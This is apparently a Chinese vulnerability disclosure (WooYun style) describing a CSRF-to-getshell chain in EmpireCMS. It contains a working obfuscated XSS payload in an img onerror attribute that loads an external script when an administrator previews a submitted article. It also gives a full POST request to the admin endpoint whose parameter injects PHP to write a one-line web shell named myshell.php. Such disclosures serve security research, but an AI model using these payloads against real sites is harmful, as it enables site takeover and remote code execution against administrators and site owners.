EmpireCMS(帝国cms)csrf getshell

漏洞作者: ../

参见漏洞: WooYun: 帝国CMS CSRF GetShell

帝国cms默认添加栏目时候默认是允许投稿。

另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。

漏洞证明:

041920436a7a75d3a69709cee90932e3cc833e12

 

图1所示,帝国添加栏目时候默认是开启投稿的。

0419213429050a91e03191b07751f1220a8a8115

 

图2所示,虽然过滤的<script>,但是未过滤img中的污染数据。这个地方插入

<img src=1 onerror='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115);document.body.appendChild(s);'>

也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell

041923060fea177d5a4dad9119f63599508b8213

 

图3所示:管理员看到未审核内容时候点击标题可以查看内容。

041926058a4deb8cae3a5c6ac887f1469811f13d

 

图4所示:管理员查看预览稿件时候调用外部1.js,post /e/admin/ecmscom.php

enews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4

在/e/admin/目录生成myshell.php一句话。

04192842935ae649d0d8d742b4c356105037457a

 

发表评论